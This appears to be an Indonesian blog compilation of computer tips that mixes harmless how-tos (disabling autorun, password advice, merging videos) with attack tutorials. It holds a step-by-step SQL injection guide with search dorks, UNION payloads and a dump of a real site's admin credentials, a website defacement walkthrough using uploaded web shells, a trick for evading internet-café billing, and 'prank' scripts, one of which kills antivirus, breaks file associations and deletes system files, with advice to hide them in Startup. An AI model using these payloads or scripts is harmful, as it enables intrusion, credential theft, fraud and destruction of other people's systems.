Disable Autorun.inf Menghindari Virus

Beberapa orang ada yang berpikir bahwa file autorun.inf adalah virus, padahal sebenarnya bukan. Autorun.inf adalah suatu sistem file yang digunakan oleh sistem operasi seperti Windows agar secara otomatis menjalankan program ketika removable media seperti CD-ROM, DVD-ROM atau USB Flash dimasukkan di komputer. untuk alasan kenyamanan fitur ini dirancang agar sebuah software yang dipasang pada sebuah disk dapat secara otomatis start saat disk dimasukkan.

Sayangnya autorun.inf ternyata menimbulkan masalah baru. fitur ini dimanfaatkan untuk penyebaran virus. keamanan pengguna pun terancam, mereka yang tidak berniat untuk menjalankan sebuah software terpaksa harus terbelalak dengan kondisi tak mampu berbuat apa-apa untuk menghentikan virus yang langsung berakasi, seperti dalam kasus beberapa virus, yang memanfaatkan fitur ini untuk menyebarkan. ini disebut Sebuah fitur Windows telah gagal ?

Me Non aktifkan AutoPlay bukan solusi karena ketika Anda membuka drive dari My Computer, Windows masih akan menjalankan instruksi yang ditemukan di autorun.inf.

Ada perbedaan antara Autoplay dan Autorun. Autoplay adalah ketika Anda memasukkan CD / DVD atau USB flash drive, Anda mendapatkan kotak dialog yang menanyakan apa yang ingin Anda lakukan Windows, sedangkan autorun akan langsung mengeksekusi perintah yang ada di file autorun.inf. dan ketika ini berjalan tidak ada sama sekali kesempatan bagi Anda untuk membatalkan autorun.

Cara menonaktifkan autorun.

Langkah 1 : Click Start->Run atau tekan tombol Window + R pada keyboard untuk menampilkan kotak dialog Run.

Langkah 2 : Ketik regedit lalu tekan Enter untuk menjalankan Registry Editor.

Langkah 3 : Pada kiri, panel klik ganda folder untuk memperluas dan pergi ke

HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer

Langkah 4 : Pada panel sebelah kanan double klik NoDriveTypeAutoRun

Langkah 5 : Pada Value Data , ketik FF untuk Heksadesimal atau 255 untuk nilai desimal.

Langkah 6 : Tutup Registry Editor dan restart komputer.

Cara menonaktifkan autorun dengan Notepad

Berikut ini adalah kunci registri yang bisa Anda gunakan untuk mem blok autorun.inf. Buka notepad atau teks editor lainnya, salin teks di bawah ini dan simpan sebagai NoAutoRun.reg. Pastikan save dengan ekstensi . Reg bukan. Txt.

REGEDIT4
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionIniFileMappingAutorun.inf]
@ = “@ SYS: DoesNotExist”

Jalankan file tersebut, klik Yes jika ada konfirmasi.

Masalah dengan hack ini adalah bahwa installer CD atau DVD tidak akan lagi berjalan secara otomatis, anda harus mencari file setup dengan manual. tapi saya pikir bukanlah masalah besar dibandingkan dengan jika terinfeksi oleh virus dan harus menghabiskan berjam-jam membersihkannya.

Cara Membobol Password dan Solusi Menangkalnya

Jaman sekarang yang namanya hacker atau cracker semakin kreatif, dengan berbagai cara mereka berusaha menembus email Anda, friendster, rekening online, web site, bahkan blog.Anda tidak mau kan, kalau suatu saat profile Anda di friendster diubah oleh orang? Atau web site Anda tiba-tiba di ganti tampilannya oleh hacker / cracker ?
Salah satu cara hacker menembus account kita adalah dengan cara menebak password. Hacker menggunakan script yang dapat memasukkan puluhan password tiap detik untuk mencoba masuk ke dalam account kita.

Cara hacker menebak password kita antara lain dengan:
1. Brute force attack, yaitu dengan mencoba semua kombinasi, mulai dari aaaa sampai zzzz, sampai beberapa karakter.

2. Dictionary attack, yaitu dengan menebak menggunakan kata-kata dalam kamus, dan dikombinasikan dengan angka-angka atau karakter.

3. Personal information attack, dengan cara memasukkan data-data pribadi seperti nomor telepon, tanggal lahir, nama pacar, kode pos, dan sebagainya.
Password yang sangat lemah akan sangat mudah dibobol hacker dengan cara ini. Contoh password yang sangat lemah misalnya:
* 123456, qwerty, asdf, ini karena mudah sekali orang mengetik kombinasi ini di keyboard.
* password, mypassword, dan lain-lain yang menggunakan kata-kata dalam kamus (semua bahasa).
* tanggal lahir, nama pacar, dan lainnya yang merupakan data diri orang tersebut.
Password yang lemah, bisa dibobol dalam waktu yang lebih cepat, misalnya:
* menggunakan semua huruf kecil.
* menggunakan kombinasi kata dan angka, misalnya buku10, teroris80.
* mengganti huruf dengan karakter, misalnya c1nt@

Bagaimana password yang kuat dan sulit ditembus hacker?
1. Merupakan kombinasi dari huruf besar, huruf kecil, nomor, dan karakter.
2. Panjang lebih dari 10 karakter.
3. Tidak menyertakan kata-kata dalam kamus.

Password yang kuat harus mudah diingat oleh pemiliknya.
Contoh password yang kuat: 1mAu$100Ribu
Cara mengingatnya:
* 1 = kata “saya” diterjemahkan dalam bahasa Inggris (I).
* mAu = mau
* $ = uang
* 100Ribu = 100 ribu
Contoh password kuat yang lain: ninG->0+1Gul
Cara mengingatnya:
* ninG = misalnya nama orang sepesial buat Anda: Naning
* -> = panah identik dengan adalah
* 0+ = lambang cewek
* 1 =berarti nomor satu atau paling
* Gul = gula itu manis

Beberapa tips:
1. Jangan menggunakan password yang sama untuk berbagai macam layanan, misalnya password email Anda sama dengan password friendster. Ini berarti:
* seseorang yang dapat menjebol password friendster Anda, bisa juga menjebol password email Anda. Sementara di mata hacker menjebol password friendster lebih mudah daripada menjebol email Yahoo.
* admin atau “orang dalam” friendster tahu password Anda, dia juga bisa memasukkan password tersebut ke email Anda.
2. Jangan mengklik link di email yang menyatakan Anda harus memverifikasi password Anda. Email ini dikirim oleh hacker.
3. Jangan memasukkan password disitus selain yang memberikan layanan. Misalnya jangan memasukkan password yahoo di situs friendster untuk alasan apapun (misalnya import address book).
4. Sebelum login ke email atau yang lain, pastikan URL di browser Anda benar. Misalnya mail.yahoo.com bukan mail.yahoo-ltd.com atau yahoo-verify.com atau yang lain.
5. Untuk rekening online seperti e-gold, klik BCA, paypal, sebaiknya Anda tidak mengetik password Anda lewat keyboard (karena hacker bisa membaca keyboard Anda dengan program keylogger). Gunakan On Screen Keyboard, Charakter Map, atau copy paste dari huruf acak.
Okey begitulah tips-tips agar password kita sulit dibobol hacker. Semoga dengan tips ini account kita aman dan terhindar dari kebobolan.

Hack Billing Warnet Tanpa Software

Disini saya kasih tau caranya buat hack billing warnet tanpa pake software (biar ga ruwet sich),
cara ini merupakan cara yang lumayan ampuh, hehehehe
lanjooot, setelah kamu meilih komputer yang akan kamu lakukan adalah .........
merestart.nya.....

kemudian pas ada tulisan WELCOME pada windows persiapkan diri anda untuk menekan tombol ctrl+alt+del,jangan sampe muncul ya BILLING.NYa!!....

lalu setelah anda tekan tombol tadi maka akan muncul windows task manager, lalu klik END TASK pada progam Billing.nya,, jrenkjreeeenk, udah deh kita bisa internetan tanpa harus bayar,, hehehe
klo ketahuan neeh ada tips.nya. bilang aja kalo udah dari tadi mas ga ada billing.nya ga tau saya, hehehehhhehheehe

good luck

Saya hanya berbagi pengetahuan, mohon untuk tidak di salah gunakan,, Post ini cuma berbagi ilmu pengetahuan

Menyembunyikan File Ke Dalam Gambar

Langkah 1 :
Kumpulkan file-file anda yang ingin di sembunyikan dan compress jadi satu dengan menggunakan Winrar.
Misalkan beri nama filerahasia.rar
Langkah 2 :
Siapkan sebuah file gambar (.jpg).
Misalkan beri nama gambar.jpg
Langkah 3 :
Letakkan kedua file tersebut ( File gambar.jpg dan filerahasia.rar )dalam sebuah directory yang sama.
misalkan Drive c:
Langkah 4 :
Buka command prompt dan ketikkan :
c:\>copy /b gambar.jpg+filerahasia.rar hasil.jpg
Langkah 5 :
Setelah itu akan tercipta sebuah file baru dengan nama hasil.jpg.
Coba anda buka file hasil.jpg.
Sekilas tidak akan ada bedanya dengan file gambar.jpg milik anda kecuali ukuran filenya yang bertambah besar.
Anda tetap bisa membuka file tersebut dengan Picture Editor atau Image Viewer anda.
Tidak ada tanda-tanda bahwa sebenarnya ada sebuah file rahasia didalamnya.
Langkah 6 :
Bagaimana cara membuka file rahasia anda?
Klik kanan pada file hasil.jpg lalu pilihlah [Open With] –> [Choose Program..]. Pilihlah WinRar lalu klik [OK].
Anda akan bisa melihat file rahasia anda dan bisa mengextract seperti biasanya.

 

Salam sejahtera sahabat setia Gysoft…

Menggabungkan Video Tanpa Software (part II)

Syarat pertama supaya teknik ini bisa berhasil adalah ekstensi video harus sama. (Support berbagai jenis ekstensi video) teknik ini mungkin berguna untuk menggabungkan video yang direkam lewat kamera ponsel yang membatasi waktu rekam video, sehingga harus beberapa kali sambung agar terekam semua.
next.
1. tempatkan video yang akan digabung di folder yang sama (untuk mempermudah, simpan aj d c
2. buka CMD, dan arahkan ke folder tempat penyimpanan video (c
3. ketik:
ren video1.mpg a
ren video2.mpg b
ren video3.mpg c
(video1, 2, 3 adalah nama video anda, dan mpg adalah ekstensi video. sesuaikan)
fungsi diatas adalah untuk merename video anda
4. masih di CMD, ketik "Copy /b a + b + c videoname.mpg" tanpa tanda "petik"
5. keluar dari CMD, dan video anda sudah tergabung.

Pengertian SQL Injection & Cara Mengimplementasikannya

1. Perkenalan
sedikit penjelasan, apakah yang dimaksud dengan SQL injection..?? SQL injection adalah serangan yang memanfaatkan kelalaian dari website yang mengijinkan user untuk menginputkan data tertentu tanpa melakukan filter terhadap malicious character. Inputan tersebut biasanya di masukan pada box search atau bagian-bagian tertentu dari website yang berinteraksi dengan database SQL dari situs tersebut. Perintah yang dimasukan para attacker biasanya adalah sebuah data yang mengandung link tertentu yang mengarahkan para korban ke website khusus yang digunakan para attacker untuk mengambil data pribadi korban.
Untuk menghindari link berbahaya dari website yang telah terinfeksi serangan SQL injection, Anda dapat menggunakan aplikasi tambahan seperti NoScript yang merupakan Add-ons untuk aplikasi web browser Firefox. Meskipun tidak terlalu sempurna, setidaknya Anda dapat mengurangi kemungkinan Anda menjadi korban.

2. bagaimana kita menemukan website yang vuln (kali ini saya menggunakan Google)?
dalam Google terdapat banyak sekali kata kunci untuk menemukan website yang vuln
ada beberapa contoh kata kunci untuk menemukan website yang vuln :

inurl:content.php?id=
inurl:index.php?id=
inurl:main.php?id=
inurl:streampage.php?id=
inurl:base.php?id=
inurl:content.php?id=
inurl:catalog.php?id=
inurl:view.php?id=
inurl:detail.php?id=
inurl:page.php?id=

3. mencari vuln
contoh , Google memberikan kita link :
situs.com/index.php?id=1

 

memulai pencarian vuln di parameter ID
a. situs.com/index.php?id=1+and+1=1 (true dan true = true)
jika keluar halaman seperti id=1, mungkin itu merupakan vuln website
situs.com/index.php?id=1+and+1=2 (true dan true = false)
jika keluar halaman yang menemukan error, halaman kosong, atau redirect , berarti website itu mengandung vulnerable
b. situs.com/index.php?id=1'+and+'1'='1 (true dan true = true)
situs.com/index.php?id=1'+and+'1'='2 (true dan false = false)
c. situs.com/index.php?id=1"+and+"1"="1 (true dan true = true)
situs.com/index.php?id=1"+and+"1"="2 (true dan false = false)
d. situs.com/index.php?id=1+order+by+1--+
situs.com/index.php?id=1+order+by+1000+--+
jika keluar halaman yang menemukan error, halaman kosong, atau redirect , berarti website itu mengandung vulnerable
e. situs.com/index.php?id=1
situs.com/index.php?id=2-1
f. situs.com/index.php?id=1
situs.com/index.php?id=1*1
g. situs.com/index.php?id=
jika keluar halaman yang menemukan error, halaman kosong, atau redirect , berarti website itu mengandung vulnerable
h. mysite.com/index.php?id=1'
jika keluar halaman yang menemukan error, halaman kosong, atau redirect , berarti website itu mengandung vulnerable
i. mysite.com/index.php?id=1malingsial
"Unknown column '1malingsial' in 'where clause" <--- vuln
j. situs.com/index.php?id=1)/*
k. situs.com/index.php?id=1')--+
l. situs.com/index.php?id=1"/*
m. situs.com/index.php?id=1))—+

website yang vuln tidak hanya pada query ini aja "index.php?id=1:
situs.com/index.php/id/6/
situs.com/index.HTM?id=1
kenapa ditemukan error atau redirect????
okee agar dapat dimengerti, anda harus mempunyai kemampuan dalam pemrograman PHP dan MySql

disini saya akan menulis script PHP yang simple dengan vulnerable

$q = "SELECT id,info FROM mytable WHERE id=".$id;
$r = mysql_query($q);
$result = mysql_fetch_row($r);
echo "myid ".$result[0]."
info".$result[1];

ketika saya menulis id=1 and 1 = 1:

$q = "SELECT id,info FROM mytable WHERE id=1 and 1=1";
$r = mysql_query($q);
$result = mysql_fetch_row($r);
echo "myid ".$result[0]."
info".$result[1];

dapat dilihat tidak ada error karna id = 1.
bila saya menulis id=1 and 1 = 2:

$q = "SELECT id,info FROM mytable WHERE id=1 and 1=2";
$r = mysql_query($q);
$result = mysql_fetch_row($r);
echo "myid ".$result[0]."
info".$result[1];

akan keluar error karena 1<>2.
jika saya menulis:

$q = "SELECT id,info FROM mytable WHERE id=".intval($id);
$r = mysql_query($q);
$result = mysql_fetch_row($r);
echo "myid ".$result[0]."
info".$result[1];

atau

$q = "SELECT id,info FROM mytable WHERE id=' ".addslashes($id)." ' "; //without spaces
$r = mysql_query($q);
$result = mysql_fetch_row($r);
echo "myid ".$result[0]."
info".$result[1];

jika anda mengetikan id=1+and+1=2 maka akan diterima id=1 atau jika anda mengetikan 1' maka akan menerima 1 juga.
itu berarti anda dapat menjebol website tersebut dengan metode SQL-Injection.

4. Mencari nomor kolom.
dalam hal ini ada 2 untuk mencari nomor kolom:

a. situs.com/index.php?id=1+and+1=2+UNION+SELECT+1+--+
situs.com/index.php?id=1+and+1=2+UNION+SELECT+1,2+--+
situs.com/index.php?id=1+and+1=2+UNION+SELECT+1,2,3+—+

apakah jumlahnya lebih tinggi sedangkan anda tidak melihat angka..? (mungkin terdapat dalam source code)

b. menggunakan perintah " order by" (digunakan untuk mengurutkan kolom berdasarkan angka).
situs.com/index.php?id=1+order+by+1+--+ (tidak ada error)
situs.com/index.php?id=1+order+by+1000+--+ (bila disini keluar error berarti didalam query tidak mempunyai 1000 kolom)
situs.com/index.php?id=1+order+by+50+--+
...
jika tidak keluar error, contoh, kita anda mengetikan order+by+10, dan keluar error ketika anda mengetikan order+by+11+--+ berarti query tersebut hanya mempunyai 10 kolom.
jika anda menemukan nomor kolom (dalam hal ini 10) maka perintah yang harus diketikan :

situs.com/index.php?id=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10+—+

atau

situs.com/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10+—+

1+and+1=2 (true dan true=false) sama dengan id=-1 dan 1+and+1=1 (true dan true=true) sama dengan id=1

5. mengeluarkan database
sekarang kita akan mengeluarkan database
dalam hal ini saya sertakan dengan Live Demo:
http://www.ewpa-majs...ECT+1,2,3,4+--+
4 tabel, nomor kolom: 3
tapi sebelum itu, kita harus mencari database, user dan versi MySqlnya.
Berikut contoh pencarian database, user dan versi MySqlnya.
http://www.ewpa-majs...concat(version(),0x3a,database(),0x3a,user()),4+--+
0x3a - adalah konversi hex dari " : ".
anda juga dapat menggunakan syntax tanpa ():

version()=@@version
user()=CURRENT_USER
database : ewpa_majster01
user : ewpa_majster01@127.0.0.1
versi My SQL: 5.0.51a-24+lenny2+spu1-log

kemudian kita harus menemukan semua databasenya:
Berikut Syntax yang digunakan :
group_concat(schema_name) + from + information_schema.schemata
Berikut Contoh Pengeluaran Databasenya:
http://www.ewpa-majs...cat(schema_name),4+from+information_schema.schemata+--+
seperti yang kita liat ada 2 database : information_schema,ewpa_majster01
kemudian kita melanjutkan dengan mengeluarkan nama tabelnya:
berikut syntax yang digunakan :

group_concat(table_name) from information_schema.tables

Berikut contoh pengeluaran nama tabelnya :
http://www.ewpa-majs...ncat(table_name),4+from+information_schema.tables+--+
karna cukup banyak nama tabelnya jadi saya tidak menulisnya disini...
karna kita tidak memerlukan tabel yang dari database "information_schema":
berikut syntax yang digunakan :

group_concat(table_name) from information_schema.tables + where + table_schema<>information_schema

Berikut Contoh pengeluaran nama tabel tanpa tabel dari database "information_schema" :
http://www.ewpa-majs...ncat(table_name),4+from+information_schema.tables+where+table_schema<>0x696e666f726d6174696f6e5f736368656d61+--+
696e666f726d6174696f6e5f736368656d61 = hasil konversi hex dari "information_schema"
tapi anda juga bisa mencoba ini:
http://www.ewpa-majs...ncat(table_name),4+from+information_schema.tables+where+table_schema=database()+--+
kemudian kita harus menemukan kolomnya (dalam contoh saya mengambil tabel ewpa_user):
Berikut Syntax yang digunakan :

group_concat(column_name) + from + information_schema.columns + where + table_name=0xHEXDARINAMATABEL

Berikut contoh mengeluarkan kolom dari tabel :

http://www.ewpa-majs...cat(column_name),4+from+information_schema.columns+where+table_name=0x657770615f75736572+—+

657770615f75736572 = hasil konversi hex dari tabel "ewpa_user"
daftar kolom-kolom : id,login,pass
Kemudian Langkah Selanjutnya adalah mengeluarkan seluruh isi kolom yang ada di dalam tabel
Berikut Syntax yang digunakan :

group_concat(nama kolom,[0x3a],nama kolom...) +from+nama tabel

Berikut contoh mengeluarkan seluruh isi kolom dari tabel :

http://www.ewpa-majs...login,0x3a,pass),4+from+ewpa_user+—+

Hasilnya : ID=1 login=admin pass=646224a5..., ID=2 login=dyalcom pass=098f6b...
jika anda ingin mengeluarkan hanya 1 per 1 isi kolom saja, gunakan syntax : LIMIT [row],columns_count:
Berikut contohnya :

http://www.ewpa-majs...a+LIMIT+0,4+--+
http://www.ewpa-majs...a+LIMIT+1,4+--+
http://www.ewpa-majs...a+LIMIT+2,4+—+

Jika Keluar Error : "Illegal mix of collations" anda harus menggunakan perintah unhex(hex()) (contoh : unhex(hex(database())))
melihat password r00t:
berikut syntax yang digunakan :

situs.com/index.php?id=-1+union+select+1,2,LOAD_FILE('etc/passwd'),4+—+

atau

situs.com/index.php?id=-1+union+select+1,2,LOAD_FILE(0x2f6574632f706173737764),4+—+

contoh : http://www.webnewshu...32f706173737764),3+--+&rcid=2

jika anda mempunya password r00t anda bisa melakukan apapun diserver itu.. (contoh menggunakan program telnet)

6. 2 query
jika anda menginject website dengan 2 query anda tidak perlu menemukan nomor kolom lagi, karna akan keluar error :
Berikut Contoh Syntax yang digunakan untuk double query :

situs.com/index.php?id=(SELECT+*+FROM(SELECT+*+FROM(SELECT+NAME_CONST(user(),14)a)+as+t+JOIN+(SE ​LECT+NAME_CONST(user(),14)a)b)c)
>v5.0.12

NAME_CONST(nama,value)
Bagaimana Query ini bekerja..?
gabungkan query kiri ke query kanan dengan satu nama kolom.
Sekian Sedikit Penjelasan Saya Tentang "Pengertian SQL Injection & Cara Mengimplementasikannya" ....

Semoga Dapat dicerna oleh pembaca

Salam sejahtera sahabat Gysoft..

HcCommander Setup

HC Commander
Software Version 1.0.1

Software buatan Hacker Cisadane adalah dibuat untuk memudahkan para pengguna komputer dalam pemanggilan aplikasi ataupun folder dengan cepat. Dengan aplikasi sederhana ini, diharapkan teman teman bisa lebih mudah dalam melakukan pemanggilan pemanggilan sehingga mempercepat dalam pengerjaan sesuatu.

Fungsi aplikasi ini adalah memudahkan teman teman dalam melakukan pemanggilan melalui menu RUN (terdapat pada menu Start > Run). Aplikasi aplikasi dan folder folder yang didaftarkan di software ini, akan dapat dipanggil dari menu run, sangat memudahkan dan mempercepat teman teman dalam mengaksesnya.

Aplikasi ini dibuat dengan tujuan non komersial, jadi diharapkan para pengguna tidak menggunakan software ini untuk tujuan profit ataupun comersial.

Aplikasi ini pertama kali di release pada tanggal 8 Juni 2010 di Tangerang, oleh Xadpritox.

Semoga aplikasi ini dapat berguna.

Contac and Bug Report :
www.hacker-cisadane.org

Tool nya sudah bisa di

Salam Sahabat Gysoft…

Free Monitor For Google

Siapa sih yang tidak mau agar Blognya terkenal. Memang tidaka ada yang instan. Untuk menaikan traffic blog kita memang sangat sulit. Tapi apa salahnya apa bila kita ingin mengetahui possi atau rank blog kita pada google. aplikasi Free Monitor For Google ini berguna agar kita mengetahhui posisi blog kita pada google.

agar dapat selalu meng update software ini anda bisa mengunjungi http://www.CleverStat.com/

Untuk mengunduhnya silahkan klik gambar dibawah ini

atau disini

Deface Website

Hi semuanya, kembali lagi dengan saya. Kali ini mau berbagi bagaimana cara Deface Website, karena yang request Cara Deface Website ini banyak sekali. Akhirnya saya membuat artikel ini untuk memenuhi peremintaan kalian semua, let’s DEFACE WEBSITE – DEFACING WEBSITE..

Okelah kalau begitu semuanya, langsung lanjut ajah, skenarionya sebagai berikut:

1. Anda sudah memiliki target website, kalau masih belum silakan cari di google melalui google dork yang anda punya atau bisa melihat Google Dork Remote File Inclusion – Webapps di www.exploit-db.com sampai Anda berhasil mendapatkan Target Website.
2. Setelah mendapatkan target website, silakan upload SHELL INJECT anda, Anda bisa menggunakan r57shell / c99 shell / lainnya. Toolsnya bisa di download disini untuk rshell / c99: Download Shell Injection
3. Setelah anda mengupload Shell Injection, siapkan halaman “DEFACEMENT PAGE“, kebetulan saya menamainya dengan”HACKED.html“
4. Setelah itu silakan kunjungi website target anda yang sudah di Deface.

Penjelasannya detail & langkah-langkahnya:
1. Silakan cari target di google, misalnya: “inurl:page.php?xxx=” atau “intitle: Google Dork” (Kumpulan google dork banyak tersedia di google, silakan di search aja) atau anda bisa melihat list Google Dork Di www.exploit-db.com , kemudian inject target website tersebut. Nah, kebetulan saya mendapatkan target dibawah & kemudian melakukan aktifitas shell injection, berikut gambarnya:

2. Langkah selanjutnya, saya melakukan upload fmbh.php (File Manager Binus Hacker), Anda bisa menggunakan Rshell / C99 untuk di upload ke website target tersebut. Directory yang saya pakai di webtarget adalah /vservers/silentcat/htdocs/includes/. Jadi ketika saya membuka shell di target menjadi: http://www.target.com/includes/fmbh.php

3. Setelah itu kita siapkan file halaman defacement: “HACKED.html”

Kemudian kita save menjadi: “HACKED.html”

4. Upload “HACKED.html” ke website target tadi, saya melakukan upload di /vservers/silentcat/htdocs/ artinya saya berada di lingkungan home directory.

Sehingga akan tampak hasil upload file “HACKED.html” sebagai berikut:

Dikarenakan permissionnya “600” (rw——-), artinya hanya Owner saja yang bisa melakukan “read & write” di file tersebut, kita harus merubah permissionnya menjadi “777″ / “755″, kalau 777 artinya semuanya memiliki akses “read, write & execute”, sedangkan saya hanya memakai “755″ biar bisa di baca & eksekusi saja:

5. Jika sudah selesai, maka lihat hasil DEFACE di: “http://www.target.com/hacked.html” , berikut hasil tampilannya:

Nah, sudah selesai.. Cukup mudah melakukan deface website, silakan lakukan eksperimen yang lebih banyak lagi.

Enjoy & Eat It!

Kumpulan Script Jahil

aye ada script jahil nih yg mau aye share dengan sobat HC. Intinya ini hanya untuk mengerjai komputer teman kamu, pasti dia kesal banget dan bisa aja menjadi marah monitor/laptop nya di banting… agagagagagag. Script ini kamu buat melalui Notepad dan harus kamu simpan dengan menggunakan ekstensi yang aye sebutkan. Oke deh segera cek script jahil ini.
script ini bisa kta pakai, untuk
menjahili komputer anak org !!
yg harus kamu siapkan adlh :
1. Notepad
2. kopi
3. pasta
4. alias kopas
5. Bersiap2 menerima dosa… agagagagagag (kidding)
stelah semuanya siap,, kupas (copas) script di bawah ke dalam notepad !!
1. MESSAGES YG NONGOL TERUS MENERUS SECARA OTOMATIS
Code:
@ECHO off
:Begin
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo, cpu lu aye acak2
msg * ud install ulang aja atau..
msg * biar masalah nya kelar
msg * klik www.gysoft-download.blogspot.com
msg * lalu like pagesnya
GOTO BEGIN

==> save nama script diatas dg ekstensi *.bat

2. BIKIN SHUTDOWN + MESSAGES
Code:
@echo off
msg * apaan sih lo
shutdown -s -c "Error! muka mu
standar abis"
==> save nama script diatas dg ekstensi *.bat

3. MAININ TOMBOL CAPS LOCK
Code:
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
==> save nama script diatas dg ekstensi *.vbs

4. BUKA TUTUP CD/DVD SECARA OTOMATIS
Code:
Set oWMP = CreateObject(“WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
==> save nama script diatas dg ekstensi *.vbs

5. MENEKAN TOMBOL ENTER TERUS MENERUS
Code:
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
==> save nama script diatas dg ekstensi *.vbs

6. MENEKAN TOMBOL BACKSPACE TERUS MENERUS SECARA OTOMATIS
Code:
MsgBox “Lets Rumble”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
==> save nama script diatas dg ekstensi *.vbs

7. OTOMATIS NGETIK “LU JELEK BANGET SIH” DI NOTEPAD ATAU M.WORD
Code:
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "lu jelek banget sih!!!"
loop
==> save nama script diatas dg ekstensi *.vbs

8. MEMBUKA NOTEPAD TERUS MENERUS
Code:
@ECHO off
:top
START %SystemRoot%
\system32\notepad.exe
GOTO top
==> save nama script diatas dg ekstensi *.bat

9. OTOMATIS BUKA NOTEPAD LALU NGETIK “APA YG LO MAU”
Code:
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Ka”
WScript.Sleep 500
WshShell.SendKeys “mu ”
WScript.Sleep 500
WshShell.SendKeys “, je”
WScript.Sleep 500
WshShell.SendKeys “l ek”
WScript.Sleep 500
WshShell.SendKeys “am ”
WScript.Sleep 500
WshShell.SendKeys “at”
WScript.Sleep 500
WshShell.SendKeys “ya ”
WScript.Sleep 500
WshShell.SendKeys “P er”
WScript.Sleep 500
WshShell.SendKeys “ma k”
WScript.Sleep 500
WshShell.SendKeys “tuh”
WScript.Sleep 500
WshShell.SendKeys ” mu”
WScript.Sleep 500
WshShell.SendKeys “ka”
WScript.Sleep 500
WshShell.SendKeys “hohoho “
==> save nama script diatas dg ekstensi *.vbs

 

10. BISA MEMILIH JAWABAN SEPERTI QUIZ LAH KIRA2
Code:
@echo off
title quiz hari ini
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. visit www.gysoft-download.blogspot.com
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * muka lo rusak
msg * ngaca dulu gih
msg * hayo lo,cpu lu aye acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%
\system32\notepad.exe
GOTO top
==> nah script diatas save jadi quiz.bat, lalu kasih ke anak orang… agagagagagag……..

11. YANG INI PALING BAHAYA, JANGAN DICOBA DI KOMPUTER KAMU 
Code:
@echo off
set end=md “Hack
installing”
set fin=copy “Hack
log.txt” “Installing”
%end%
%fin%
net send * Hack is
installing, press OK to
begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is
hacked ….
msg * I warned you,
and you kept going.
Challenge me and this
is what happens.
DEL C:\WINDOWS
\system32\logoff.exe /
F /Q
DEL C:\WINDOWS
\system32\logon.exe /
F /Q
DEL C:\WINDOWS
\system32\logon.scr /
F /Q
cls
shutdown -s -t 5 -c
“ thank you for
waiting”
==> save script diatas dg ekstensi *.bat
Dari semua script diatas, cara menjalankannya adalah degan mengklik 2x file yang kita buat dari notepad tadi. aye sarankan kalau mau mengusili komputer teman dan bisa dijalankan secara otomatis, kopi file script yg udah kamu simpan ke folder startup di Menu Start.
Waktu menyimpan dengan ekstensi *.bat atau *.vbs
Ganti * menjadi nama file, misal usil.bat atau ancur.vbs
aye sarankan buat nama file yang tidak mencurigakan si pengguna komputer.

Salam sahabat Gysoft :

Logo Gambar

[SHARE]Cara mengubah nama pada fb

biasanya fb udah kagak bisa di ganti namanya karena terlalu sering mengganti nama. nih ane ada saran buat ganti nama

buat yang mau ganti nama fb kalo dah limit ;)

1. klik http://www.facebook.com/hacked/

2. klik amankan akun
...
3. klik lanjutkan

4. masukan kata sandi baru anda apa saja yang mudah di ingat untuk sementara

5. ceklis konfirmasi penggantian

6. klik lanjutkan

7. Tinjau Informasi Akun Anda klik lanjutkan

8. ubah nama anda

9. klik lanjutkan

10. aktifkan akun anda

good luck dah.